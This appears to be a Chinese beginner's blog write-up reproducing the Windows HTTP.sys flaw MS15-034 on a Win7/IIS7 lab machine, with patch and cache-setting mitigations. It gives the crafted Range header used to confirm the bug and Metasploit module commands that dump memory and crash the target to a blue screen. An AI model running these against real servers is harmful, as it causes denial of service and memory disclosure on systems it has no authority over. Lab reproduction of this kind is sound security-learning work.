HTTP.sys远程代码执行漏洞

1. 漏洞描述

Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序。HTTP.sys会错误解析某些特殊构造的HTTP请求,导致远程代码执行漏洞。成功利用此漏洞后,攻击者可在System帐户上下文中执行任意代码。由于此漏洞存在于内核驱动程序中,攻击者也可以远程导致操作系统蓝屏。此次受影响的系统中,Windows7、Windows8、WindowsServer 2008 R2和WindowsServer 2012所带的HTTP.sys驱动均存在一个远程代码执行漏洞,远程攻击者可以通过IIS7(或更高版本)服务将恶意的HTTP请求传递给HTTP.sys驱动,通过发送恶意的HTTP请求导致远程代码执行或操作系统蓝屏。

2. 复现环境

win7+IIS7

3.漏洞确认

访问IIS界面,使用burpsuite抓包,发送到repeater中,在HTTP请求头中加入如下字段
Range: bytes=18-18446744073709551615 ,返回416状态码
在这里插入图片描述

4.漏洞利用

使用kali的metasploit

  • msconsole
  • search ms15-034
    在这里插入图片描述验证漏洞的方法
  • use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
  • set rhosts 192.168.1.200
  • run
    在这里插入图片描述
    利用漏洞的方法
  • use auxiliary/dos/http/ms15_034_ulonglongadd
  • set rhosts 192.168.1.200
  • set threads 10
  • run
    在这里插入图片描述
    实验电脑已经蓝屏

5.漏洞修复

方法1:微软官方网站下载ms15-034的补丁包
下载地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
方法2:网上的其他方法验证
IIS-功能视图-输出缓存-操作-编辑功能设置-启用内核缓存,取消勾选。
注意:

  • 在网站-default web site下的输出缓存,不是根目录下的输出缓存
  • 修改后,漏洞验证仍显示存在,但漏洞利用已不再蓝屏

本人小白,写此博客的目的在于梳理知识,如有不对,还请多多指教。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值